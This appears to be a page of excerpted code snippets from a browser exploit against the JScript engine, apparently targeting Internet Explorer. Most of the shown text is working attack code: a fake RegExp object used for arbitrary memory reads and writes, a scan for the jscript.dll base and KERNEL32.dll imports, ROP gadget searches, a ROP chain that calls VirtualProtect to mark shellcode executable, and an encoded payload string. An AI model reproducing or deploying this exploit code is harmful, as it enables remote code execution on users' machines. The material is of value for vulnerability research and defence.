This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| kZ065np7(PK4968+4,wnU86O+1); // rop gadget: ret | |
| kZ065np7(PK4968+32,wnU86O); // rop gadget: pop eax; ret | |
| kZ065np7(PK4968+36,wnU86O+1); // rop gadget: ret | |
| kZ065np7(PK4968+40,J56m55);// / virtual Protect Address | |
| kZ065np7(PK4968+44,aRc3wLj+u647wRR6); //// virtual protect return address (address shellcode) | |
| kZ065np7(PK4968+48,aRc3wLj+u647wRR6); ////lpAddress(address shellcode) | |
| kZ065np7(PK4968+52,(V9INZ9t.length*P7661n8l1));//dwSize (shellcode size) | |
| kZ065np7(PK4968+56,0x20);// flNewProtect PAGE_EXECUTION_READ | |
| kZ065np7(PK4968+60,PK4968-0x1000);// flOldProtect | |
| kZ065np7(Gf8770861L,PK4968); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| S(aC + 4, av + 1); // rop gadget: ret | |
| S(aC + 4 + 4 + 0x18, av); // rop gadget: pop eax; ret | |
| S(aC + 4 + 4 + 0x1C, av + 1); // rop gadget: ret | |
| S(aC + 4 + 4 + 0x20, au); // virtual Protect Address | |
| S(aC + 4 + 4 + 4 + 0x20, O + h);//virtual protect return address (shellcode address) | |
| S(aC + 4 + 4 + 4 + 4 + 0x20, O + h); //lpAddress (shellcode address) | |
| S(aC + 4 + 4 + 4 + 4 + 4 + 0x20, (m.length * c));//dwSize (shellcode size) | |
| S(aC + 4 + 4 + 4 + 4 + 4 + 4 + 0x20, 0x40);//PAGE_EXECUTE_READWRITE | |
| S(aC + 4 + 4 + 4 + 4 + 4 + 4 + 4 + 0x20, aC - 0x1000); //oldprotect |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var l = "\u614E\u4B74\u01c8\u0000\u0024\u0000\u0159\u0000\u0002\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0000\u0000" + "\u1E12\u0001\u1200\u0009\u0000\u740A\u1100\u770A\u0400\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\u0D03\u0000\u0000\u0000\u6F00\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0000\u0000\u0D03\u0000\uFE00\uFFFF\u00FF\u0000\u0400\uFFEF\uFFFF\u000B\u0000\u0000\u0000\uFFFF\uFFFF\u2B04\u0000\u0000\u0000\u0000\u0000\uFF00\uFFFF\u03FF\u000D\u0000\uFFF3\uFFFF\u000E\u0000\u0112\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0016\u0000\u0D03\u0000\u0B00\u0000\u0700\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u001A\u0000\u0D03\u0000\u0B00\u0000\u0000\u0000\u0300\u000D\u0000\uFFFB\uFFFF\u0000\u0000\u0D03\u0000\uF300\uFFFF\u1BFF\u0000\u1500\u1312\u0000\u0300\u000D\u0000\uFFDF\uFFFF\u0000\u0000\u030C\u000D\u0000\uFFF0\uFFFF\u |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var av = null; | |
| var ae = V(ap + 0x3C); | |
| var aw = ap + ae; | |
| var ax = V(aw + 0x1C); | |
| var ay = V(aw + 0x2C); | |
| for (var A = 0; A < ax && (av == null); A++) { | |
| var az = X(aq, ay + A - 0x54); | |
| if ((az & 0xFFFC) == 0xC358) { // ROP gadget = pop eax; ret | |
| av = ap + ay + A; | |
| continue; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function at(a) { | |
| var b = V(ap + 0x3C); | |
| var c = ar(b + 0x18 + 0x60); | |
| var f = ar(b + 0x18 + 0x60 + e); | |
| var g = ar(c + 0x18); | |
| var h = ar(c + 0x1C); | |
| var i = ar(c + 0x20); | |
| var j = ar(c + 0x24); | |
| for (nameIndex = 0; nameIndex < g; nameIndex++) { | |
| var k = ar(i + nameIndex * e); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var ae = V(Z + 0x3C); | |
| var af = ac(ae + 0x18 + 0x60 + (e * 2)); | |
| var ag = ac(ae + 0x18 + 0x60 + (e * 2) + e); | |
| var ah = "KERNEL32.dll"; | |
| var ai = false; | |
| for (var aj = af; aj < af + ag; aj += 5 * e) { | |
| var ak = ac(aj + 0x0C); | |
| var al = new Array(); | |
| var am = 0; | |
| while ((am = ad(ak++))) al.push(am); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var Z = V(O); // reads vftable pointer, from the Fake RegExp object | |
| Z = Z & 0xFFFF0000; | |
| do // locating jscript.dll module base | |
| if ((V(Z + 0x50) == 0x70207369) && \ //p si | |
| (V(Z + 0x54) == 0x72676f72) && \ // rgor | |
| (V(Z + 0x58) == 0x63206d61) && \ // c ma | |
| (V(Z + 0x5C) == 0x6f6e6e61)) break; // onna | |
| while (Z -= 0x10000); | |
| var ab = W(Z); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function S(a, b) { | |
| try { | |
| var S_array = [0x0077, 0x0110, 0x0000, 0x0000, 0x0000, \ | |
| ((b & 0xFF) << 8) | 0x03, \ | |
| (b & 0xFFFF00) >> 8, \ | |
| ((a & 0xFF) << 8) | (((b & 0xFF000000) >> 24) & 0xFF), \ | |
| (a & 0xFFFF00) >> 8, (0x07 << 8) | (((a & 0xFF000000) >> 24) & 0xFF)]; | |
| var c = String.fromCharCode.apply(null, S_array); | |
| Q.test(c); // calls fake RegExp.test() method. | |
| } catch (d) {} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var P = "\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF" + n(0x0081, O); // regexp type | |
| for (var A = x; A >= H; A--) untracked[A] = null; | |
| for (var A = 0; A < 0x1000; A++) overlay[A][P] = 1; | |
| while (--H >= 0) try { | |
| if ((typeof untracked[H]) === "object") break; | |
| else untracked[H] = null; | |
| } catch (E) {} | |
| if (H == -1) throw new Error("Could not find fake RegExp."); | |
| else {} | |
| window.close(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var M = (untracked[H].charCodeAt(((k - 4 + g) / c) + 1) << 16) | (untracked[H].charCodeAt((k - 4 + g) / c) + 2); | |
| // M points to the VAR.obj_ptr corresponding to the VAR in RegExpObj+0x48 | |
| // The memory at M is read, by creating fake VARs pointing to the addres in M (VAR.obj_ptr) | |
| var N = "\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF" + n(0x0082, M); | |
| for (var A = x; A >= H; A--) untracked[A] = null; | |
| for (var A = 0; A < 0x1000; A++) overlay[A][N] = 1; | |
| while (--H >= 0) try { |